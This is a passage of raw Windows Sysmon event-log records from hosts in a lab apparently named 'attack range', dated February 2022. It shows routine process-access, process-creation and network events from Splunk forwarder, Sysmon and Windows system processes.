Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4786B9D8DADDBA2DD98CC60DD616E3DC,SHA256=86E9F8B34F659B503BFC5671791CA73A6E470988E3FCC7A040CFB5DB15B53E87,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223055Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:42.917{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B8BB8D67425D8802306EBE966408FC5,SHA256=56AA5CE0B7FBB93086390CEB326FBC10AADF8D9B5648B4163F6E3F62E342631E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000299268Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:40.193{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49598-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000299269Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:42.999{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=780B3DA9E5BD5C6B08A24B32EBC45DCC,SHA256=2480ACE62FADB928798090D8048134B3D69DEEF39A14C80F1C9535D42529A721,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000223083Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:44.714{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-19F4-6216-5605-000000003902}3064C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223082Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:44.714{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223081Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:44.714{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223080Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:44.714{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223079Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:44.714{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223078Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:44.714{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223077Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:44.714{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223076Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:44.714{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223075Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:44.714{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223074Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:44.714{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223073Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:44.714{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-19F4-6216-5605-000000003902}3064C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000223072Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:44.714{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-19F4-6216-5605-000000003902}3064C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000223071Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:44.715{4F8D34B0-19F4-6216-5605-000000003902}3064C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000223070Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:44.433{4F8D34B0-19F4-6216-5505-000000003902}24361068C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223069Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:44.214{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-19F4-6216-5505-000000003902}2436C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223068Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:44.214{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223067Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:44.214{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223066Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:44.214{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223065Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:44.214{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223064Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:44.214{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223063Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:44.214{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223062Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:44.214{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223061Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:44.214{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223060Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:44.214{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223059Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:44.214{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-19F4-6216-5505-000000003902}2436C:\Program 